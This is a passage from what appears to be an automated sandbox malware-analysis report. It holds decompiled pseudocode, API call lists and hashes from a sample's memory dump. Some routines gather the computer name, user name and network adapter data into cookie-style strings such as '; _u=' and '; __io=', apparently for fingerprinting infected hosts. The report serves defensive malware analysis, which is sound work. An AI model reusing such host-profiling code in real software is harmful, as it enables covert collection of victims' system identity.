                                                                                                                                                                                                                                                                				_v12 = _t48;
                                                                                                                                                                                                                                                                				if(_t48 == 0) {
                                                                                                                                                                                                                                                                					goto L6;
                                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                                				_push( &_v24);
                                                                                                                                                                                                                                                                				_push(_t48);
                                                                                                                                                                                                                                                                				if( *_t51() == 0) {
                                                                                                                                                                                                                                                                					_t54 = _v28;
                                                                                                                                                                                                                                                                					_t52 = _t48;
                                                                                                                                                                                                                                                                					_t49 = _v24;
                                                                                                                                                                                                                                                                					do {
                                                                                                                                                                                                                                                                						if( *((char*)(_t52 + 0x1b0)) != 0x30 ||  *((char*)(_t52 + 0x1b1)) != 0x2e) {
                                                                                                                                                                                                                                                                							_t29 =  *((intOrPtr*)(_t52 + 0x190));
                                                                                                                                                                                                                                                                							if(_t29 != 0 && _t29 <= 8) {
                                                                                                                                                                                                                                                                								_t15 = _t52 + 0x194; // 0x194
                                                                                                                                                                                                                                                                								_t37 = _t37 + E000D1BD5(_t37 * 2 + _t54, _t49, _t15, _t29);
                                                                                                                                                                                                                                                                								_t49 = ":";
                                                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                                						_t52 =  *_t52;
                                                                                                                                                                                                                                                                					} while (_t52 != 0);
                                                                                                                                                                                                                                                                					HeapFree(GetProcessHeap(), _t52, _v20);
                                                                                                                                                                                                                                                                					if(_t37 == 0) {
                                                                                                                                                                                                                                                                						goto L6;
                                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                                					return _t37;
                                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                                				HeapFree(GetProcessHeap(), 0, _t48);
                                                                                                                                                                                                                                                                				goto L6;
                                                                                                                                                                                                                                                                			}

















                                                                                                                                                                                                                                                                0x000d1edb
                                                                                                                                                                                                                                                                0x000d1edd
                                                                                                                                                                                                                                                                0x000d1ee1
                                                                                                                                                                                                                                                                0x000d1eea
                                                                                                                                                                                                                                                                0x000d1eff
                                                                                                                                                                                                                                                                0x000d1f03
                                                                                                                                                                                                                                                                0x000d1f4e
                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                0x000d1f64
                                                                                                                                                                                                                                                                0x000d1f09
                                                                                                                                                                                                                                                                0x000d1f0a
                                                                                                                                                                                                                                                                0x000d1f10
                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                0x000d1f12
                                                                                                                                                                                                                                                                0x000d1f18
                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                0x000d1f2d
                                                                                                                                                                                                                                                                0x000d1f2f
                                                                                                                                                                                                                                                                0x000d1f35
                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                0x000d1f3b
                                                                                                                                                                                                                                                                0x000d1f3c
                                                                                                                                                                                                                                                                0x000d1f41
                                                                                                                                                                                                                                                                0x000d1f6d
                                                                                                                                                                                                                                                                0x000d1f71
                                                                                                                                                                                                                                                                0x000d1f73
                                                                                                                                                                                                                                                                0x000d1f77
                                                                                                                                                                                                                                                                0x000d1f7e
                                                                                                                                                                                                                                                                0x000d1f89
                                                                                                                                                                                                                                                                0x000d1f91
                                                                                                                                                                                                                                                                0x000d1f99
                                                                                                                                                                                                                                                                0x000d1fb2
                                                                                                                                                                                                                                                                0x000d1fb4
                                                                                                                                                                                                                                                                0x000d1fb4
                                                                                                                                                                                                                                                                0x000d1f91
                                                                                                                                                                                                                                                                0x000d1fb9
                                                                                                                                                                                                                                                                0x000d1fbb
                                                                                                                                                                                                                                                                0x000d1fce
                                                                                                                                                                                                                                                                0x000d1fd6
                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                0x000d1fdc
                                                                                                                                                                                                                                                                0x000d1f48
                                                                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • LoadLibraryA.KERNEL32 ref: 000D1EF2
                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 000D1EF9
                                                                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,00000001), ref: 000D1F24
                                                                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000), ref: 000D1F27
                                                                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 000D1F45
                                                                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 000D1F48
                                                                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(?,?), ref: 000D1FCB
                                                                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 000D1FCE
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.551228989.00000000000D1000.00000020.00020000.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.551211478.00000000000D0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.551305946.00000000000D4000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_d0000_sample4.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Heap$Process$Free$AddressAllocLibraryLoadProc
                                                                                                                                                                                                                                                                • String ID: ; _gid=$GetAdaptersInfo$IPHLPAPI.DLL$E
                                                                                                                                                                                                                                                                • API String ID: 2522523987-1525130766
                                                                                                                                                                                                                                                                • Opcode ID: cc2ab2d0152939180ff220822f1ce57ac75d68b1ceeb86eb4f0a816f91160e21
                                                                                                                                                                                                                                                                • Instruction ID: 283b03080867f39ec95d427f6045c020d0135ab5295c8c564cedb24cf97c5991
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: cc2ab2d0152939180ff220822f1ce57ac75d68b1ceeb86eb4f0a816f91160e21
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4031A0726443016BE320DF65EC45AABBBE8EB85760F05092FFA4593351DF78DC098A71
                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • __EH_prolog3.LIBCMT ref: 0017A7C7
                                                                                                                                                                                                                                                                • DeleteObject.GDI32(?), ref: 0017AA13
                                                                                                                                                                                                                                                                • MulDiv.KERNEL32(?,00000000,00000064), ref: 0017ABAF
                                                                                                                                                                                                                                                                • MulDiv.KERNEL32(00000064,00000000,00000064), ref: 0017ABCC
                                                                                                                                                                                                                                                                • MulDiv.KERNEL32(00000000,00000000,00000064), ref: 0017ABEB
                                                                                                                                                                                                                                                                • MulDiv.KERNEL32(00000028,00000000,00000064), ref: 0017AC08
                                                                                                                                                                                                                                                                • MulDiv.KERNEL32(?,00000000,00000064), ref: 0017AC24
                                                                                                                                                                                                                                                                • MulDiv.KERNEL32(00000000,00000000,00000064), ref: 0017AC41
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_d6000_sample4.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: DeleteH_prolog3Object
                                                                                                                                                                                                                                                                • String ID: 0$d
                                                                                                                                                                                                                                                                • API String ID: 2942389277-1143469836
                                                                                                                                                                                                                                                                • Opcode ID: 8ad414f5a8ffc1d8f78d3532c81b7b89130818df19f1176a0f1c313d39c54ae7
                                                                                                                                                                                                                                                                • Instruction ID: 0babba40bd0359c16f43211a75868d7e4b65e84fa97abe0be77f489b73cccfca
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8ad414f5a8ffc1d8f78d3532c81b7b89130818df19f1176a0f1c313d39c54ae7
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 39E1EF71A0022A9FDF18DFA9DD45ABE7BB0EF84301F508169F409E7291CB34D911DBA2
                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                C-Code - Quality: 84%
                                                                                                                                                                                                                                                                			E000D1DD9(void* __ecx) {
                                                                                                                                                                                                                                                                				char _v256;
                                                                                                                                                                                                                                                                				char _v268;
                                                                                                                                                                                                                                                                				void* _v280;
                                                                                                                                                                                                                                                                				char _v288;
                                                                                                                                                                                                                                                                				long _v292;
                                                                                                                                                                                                                                                                				char* _t23;
                                                                                                                                                                                                                                                                				int _t34;
                                                                                                                                                                                                                                                                				int _t36;
                                                                                                                                                                                                                                                                				void* _t37;
                                                                                                                                                                                                                                                                				WCHAR* _t43;
                                                                                                                                                                                                                                                                				signed int _t49;
                                                                                                                                                                                                                                                                				signed int _t50;
                                                                                                                                                                                                                                                                				signed int _t51;
                                                                                                                                                                                                                                                                				signed int _t52;
                                                                                                                                                                                                                                                                				void* _t53;
                                                                                                                                                                                                                                                                				void* _t54;
                                                                                                                                                                                                                                                                				void* _t56;
                                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                                				_t54 =  &_v280;
                                                                                                                                                                                                                                                                				_t23 =  &_v256;
                                                                                                                                                                                                                                                                				_v280 = 0x100;
                                                                                                                                                                                                                                                                				_t37 = __ecx;
                                                                                                                                                                                                                                                                				__imp__GetComputerNameExA(0, _t23,  &_v280);
                                                                                                                                                                                                                                                                				if(_t23 == 0) {
                                                                                                                                                                                                                                                                					_v268 = 0x78;
                                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                                				_t50 = E000D1B6E(_t37, L"; _u=",  &_v268);
                                                                                                                                                                                                                                                                				_v292 = 0x100;
                                                                                                                                                                                                                                                                				if(GetUserNameA( &_v268,  &_v292) == 0) {
                                                                                                                                                                                                                                                                					_v268 = 0x78;
                                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                                				_t51 = _t50 + E000D1B6E(_t37 + _t50 * 2, ":",  &_v268);
                                                                                                                                                                                                                                                                				_t53 = E000D1725( &_v288);
                                                                                                                                                                                                                                                                				_t43 = _t37 + _t51 * 2;
                                                                                                                                                                                                                                                                				if(_t53 == 0) {
                                                                                                                                                                                                                                                                					_t52 = _t51 + wsprintfW(_t43, L"%s%u", L"; __io=", 0);
                                                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                                                					_t34 = wsprintfW(_t43, L"%s%u", L"; __io=", _v288);
                                                                                                                                                                                                                                                                					_t56 = _t54 + 0x10;
                                                                                                                                                                                                                                                                					_t49 = 1;
                                                                                                                                                                                                                                                                					_t52 = _t51 + _t34;
                                                                                                                                                                                                                                                                					if(_t53 > 1) {
                                                                                                                                                                                                                                                                						do {
                                                                                                                                                                                                                                                                							_t36 = wsprintfW(_t37 + _t52 * 2, L"%s%u", "_",  *((intOrPtr*)(_t56 + 0x14 + _t49 * 4)));
                                                                                                                                                                                                                                                                							_t56 = _t56 + 0x10;
                                                                                                                                                                                                                                                                							_t52 = _t52 + _t36;
                                                                                                                                                                                                                                                                							_t49 = _t49 + 1;
                                                                                                                                                                                                                                                                						} while (_t49 < _t53);
                                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                                				return _t52;
                                                                                                                                                                                                                                                                			}




















                                                                                                                                                                                                                                                                0x000d1dd9
                                                                                                                                                                                                                                                                0x000d1ded
                                                                                                                                                                                                                                                                0x000d1df1
                                                                                                                                                                                                                                                                0x000d1df8
                                                                                                                                                                                                                                                                0x000d1dfa
                                                                                                                                                                                                                                                                0x000d1e02
                                                                                                                                                                                                                                                                0x000d1e04
                                                                                                                                                                                                                                                                0x000d1e04
                                                                                                                                                                                                                                                                0x000d1e1c
                                                                                                                                                                                                                                                                0x000d1e1e
                                                                                                                                                                                                                                                                0x000d1e35
                                                                                                                                                                                                                                                                0x000d1e37
                                                                                                                                                                                                                                                                0x000d1e37
                                                                                                                                                                                                                                                                0x000d1e55
                                                                                                                                                                                                                                                                0x000d1e5c
                                                                                                                                                                                                                                                                0x000d1e5e
                                                                                                                                                                                                                                                                0x000d1e63
                                                                                                                                                                                                                                                                0x000d1ec0
                                                                                                                                                                                                                                                                0x000d1e65
                                                                                                                                                                                                                                                                0x000d1e74
                                                                                                                                                                                                                                                                0x000d1e7c
                                                                                                                                                                                                                                                                0x000d1e7f
                                                                                                                                                                                                                                                                0x000d1e80
                                                                                                                                                                                                                                                                0x000d1e84
                                                                                                                                                                                                                                                                0x000d1e86
                                                                                                                                                                                                                                                                0x000d1e98
                                                                                                                                                                                                                                                                0x000d1e9e
                                                                                                                                                                                                                                                                0x000d1ea1
                                                                                                                                                                                                                                                                0x000d1ea3
                                                                                                                                                                                                                                                                0x000d1ea4
                                                                                                                                                                                                                                                                0x000d1ea8
                                                                                                                                                                                                                                                                0x000d1e84
                                                                                                                                                                                                                                                                0x000d1ece

                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetComputerNameExA.KERNEL32(00000000,?,00000000,00000000,7742C0B0,000D45C0,00000000), ref: 000D1DFA
                                                                                                                                                                                                                                                                • GetUserNameA.ADVAPI32(?,?), ref: 000D1E2D
                                                                                                                                                                                                                                                                • wsprintfW.USER32 ref: 000D1E74
                                                                                                                                                                                                                                                                • wsprintfW.USER32 ref: 000D1E98
                                                                                                                                                                                                                                                                • wsprintfW.USER32 ref: 000D1EB7
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.551228989.00000000000D1000.00000020.00020000.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.551211478.00000000000D0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.551305946.00000000000D4000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_d0000_sample4.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: wsprintf$Name$ComputerUser
                                                                                                                                                                                                                                                                • String ID: %s%u$; __io=$; _u=$x
                                                                                                                                                                                                                                                                • API String ID: 4095488650-3513353778
                                                                                                                                                                                                                                                                • Opcode ID: 80d6365ec5b02f0179252ab8d344413ae05608d4720bbf5667fd1961b8a7d551
                                                                                                                                                                                                                                                                • Instruction ID: 83c5162325d9885b1462ac49f34a6106aac796bf471855e5f25dd5f591684e75
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 80d6365ec5b02f0179252ab8d344413ae05608d4720bbf5667fd1961b8a7d551
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9821B532A443046BD320EF60EC45ADB77D8EF84758F440A2BFD45E6346EA75CA0887B2
                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetPropW.USER32(?), ref: 0012D19B
                                                                                                                                                                                                                                                                • GlobalFix.KERNEL32(00000000), ref: 0012D1A4
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000476,00000000,00000000), ref: 0012D1BF
                                                                                                                                                                                                                                                                • GlobalUnWire.KERNEL32(00000000), ref: 0012D1CA
                                                                                                                                                                                                                                                                • RemovePropW.USER32(?), ref: 0012D1D9
                                                                                                                                                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 0012D1E4
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_d6000_sample4.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Global$Prop$FreeMessageRemoveSendWire
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2896669287-0
                                                                                                                                                                                                                                                                • Opcode ID: 89e2c9f6f7faa63f677b176e4f022e5439e009570fb3a9bf550142d296f18257
                                                                                                                                                                                                                                                                • Instruction ID: 750eb684a22f8ee6624e764d167d2e662c25de3095a5e61813db51d6d79a3c31
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 89e2c9f6f7faa63f677b176e4f022e5439e009570fb3a9bf550142d296f18257
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F7216F31700321EFDB256B71FC4CB667ABEFB9A752F144025F94292560DFB0E860DA60
                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • __EH_prolog3_GS.LIBCMT ref: 00125BF0
                                                                                                                                                                                                                                                                • GetFullPathNameW.KERNEL32(?,00000104,00000000,?,00000268,001254A3,?,?,00000000), ref: 00125C20
                                                                                                                                                                                                                                                                  • Part of subcall function 00118704: __CxxThrowException@8.LIBVCRUNTIME ref: 00118718
                                                                                                                                                                                                                                                                • PathIsUNCW.SHLWAPI(?,?,?,00000000), ref: 00125C98
                                                                                                                                                                                                                                                                • GetVolumeInformationW.KERNEL32(?,00000000,00000000,00000000,?,?,00000000,00000000), ref: 00125CBC
                                                                                                                                                                                                                                                                • CharUpperW.USER32(?), ref: 00125CEA
                                                                                                                                                                                                                                                                • FindFirstFileW.KERNEL32(?,?), ref: 00125D02
                                                                                                                                                                                                                                                                • FindClose.KERNEL32(00000000), ref: 00125D0E
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_d6000_sample4.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: FindPath$CharCloseException@8FileFirstFullH_prolog3_InformationNameThrowUpperVolume
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2181567148-0
                                                                                                                                                                                                                                                                • Opcode ID: a3deabaf615c865492edd2d0a25457835f81d33decbc7848f367f8baba683208
                                                                                                                                                                                                                                                                • Instruction ID: 70b513302cd94069c5606b8fa535e40abe40178164755dd9ebc6900ab31af8f7
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a3deabaf615c865492edd2d0a25457835f81d33decbc7848f367f8baba683208
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AE41A3B1504625ABDB28BB60EDCDFBE777EFF50310F1046A9F415A2141EB319EA1CA60
                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_d6000_sample4.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: ]9&$]9&
                                                                                                                                                                                                                                                                • API String ID: 0-623334917
                                                                                                                                                                                                                                                                • Opcode ID: 675ccee7c228a12c69f89996fa42595af3b5340bd651056006d88a0312ababc0
                                                                                                                                                                                                                                                                • Instruction ID: 81b65d3bc32fc13b81e04878f01e2a827ec69f6039f5c0ca79975101b26ae921
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 675ccee7c228a12c69f89996fa42595af3b5340bd651056006d88a0312ababc0
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 02F17F71E1121A9FDF14CFA8D8806AEB7F1FF48315F258269E819A7380D731AD15CB94
                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_d6000_sample4.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Object$Delete$H_prolog3
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 487261545-0
                                                                                                                                                                                                                                                                • Opcode ID: 688081854a68e882ec82d7673242e0a4af26c3c0699a0582ee50d81092b0bc2d
                                                                                                                                                                                                                                                                • Instruction ID: 4315b95dc71c0f6a9e1973879d97206bb7c8211e39990267e8d3d65f733746ae
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 688081854a68e882ec82d7673242e0a4af26c3c0699a0582ee50d81092b0bc2d
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 38222871E00719DFCB24CFA9D98079DBBB1FF49300F1181AAD869AB251DB709A99CF50
                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • FindResourceW.KERNEL32(?,?,00000005,?,?,?,?,?,0012BCF4,?,?), ref: 0012D0D2
                                                                                                                                                                                                                                                                • LoadResource.KERNEL32(?,00000000,?,?,?,?,?,0012BCF4,?,?), ref: 0012D0E7
                                                                                                                                                                                                                                                                • LockResource.KERNEL32(00000000,?,?,?,?,?,0012BCF4,?,?), ref: 0012D0F9
                                                                                                                                                                                                                                                                • GlobalFree.KERNEL32(?), ref: 0012D138
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_d6000_sample4.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Resource$FindFreeGlobalLoadLock
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3898064442-0
                                                                                                                                                                                                                                                                • Opcode ID: 3d02bc84300a00aa0a8798a531c9ebb09772f9ee302419945a815b507cb584a5
                                                                                                                                                                                                                                                                • Instruction ID: 738507350588528b206e9c28d9781a3dd4447cab9805b57585add6659aff9117
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3d02bc84300a00aa0a8798a531c9ebb09772f9ee302419945a815b507cb584a5
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3E11B135100710AFCB15ABA5F889B6AB7F5EFD5322F25806CF85983661DF71DC219B10
                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • SetUnhandledExceptionFilter.KERNEL32(00000000,?,002499E9,000FB6CC,00000017), ref: 002498CF
                                                                                                                                                                                                                                                                • UnhandledExceptionFilter.KERNEL32(000FB6CC,?,002499E9,000FB6CC,00000017), ref: 002498D8
                                                                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(C0000409,?,002499E9,000FB6CC,00000017), ref: 002498E3
                                                                                                                                                                                                                                                                • TerminateProcess.KERNEL32(00000000,?,002499E9,000FB6CC,00000017), ref: 002498EA
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_d6000_sample4.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3231755760-0
                                                                                                                                                                                                                                                                • Opcode ID: 49a517360142f15673a41baf5ae4a5d300385efddd3d73f28cef3a78da5093a3
                                                                                                                                                                                                                                                                • Instruction ID: 05321bb3840422dfe886a25a66e1fd789dddc0a68c8d835cbdf1cd6617892a9f
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 49a517360142f15673a41baf5ae4a5d300385efddd3d73f28cef3a78da5093a3
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9CD0CA32000208ABCB003BE0FC0DB5C3E28AB8A356F840000F30A83021CFB184108B62
                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • IsDebuggerPresent.KERNEL32(?,?,?,?,?,0024A489), ref: 0024F73E
                                                                                                                                                                                                                                                                • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,0024A489), ref: 0024F748
                                                                                                                                                                                                                                                                • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,0024A489), ref: 0024F755
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_d6000_sample4.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3906539128-0
                                                                                                                                                                                                                                                                • Opcode ID: 089454785467cf7f7058b1139c5a890fc42221b7ac8d1fbe7ad89f5d52bacae6
                                                                                                                                                                                                                                                                • Instruction ID: 639edab06ad2a309094af63fcaec76fbff63dc5bb4dc9503126deb450aaeb925
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 089454785467cf7f7058b1139c5a890fc42221b7ac8d1fbe7ad89f5d52bacae6
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AB31E3749112299BCB25DF24ED8978DBBB8FF48310F5041EAE41CA7250EB709F958F45
                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(?,?,00259EEB,?,?,?,?,?,0024FC18), ref: 00259F0E
                                                                                                                                                                                                                                                                • TerminateProcess.KERNEL32(00000000,?,00259EEB,?,?,?,?,?,0024FC18), ref: 00259F15
                                                                                                                                                                                                                                                                • ExitProcess.KERNEL32 ref: 00259F27
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_d6000_sample4.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1703294689-0
                                                                                                                                                                                                                                                                • Opcode ID: fee16ee7ccd94fd8d37f570e99287faa79a44607d3cba68bde09f2394db70686
                                                                                                                                                                                                                                                                • Instruction ID: 4211575077d45dac96838344182b209c89a6e03e939542f1305a7e74318b8208
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: fee16ee7ccd94fd8d37f570e99287faa79a44607d3cba68bde09f2394db70686
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9FE01231010108EBCB112F54E95DA583B68EB81342B100414F80686531CB7AE9AADE94
                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • OutputDebugStringA.KERNEL32(000D13C4), ref: 001183F2
                                                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 00118429
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_d6000_sample4.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: DebugErrorLastOutputString
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 4132100945-0
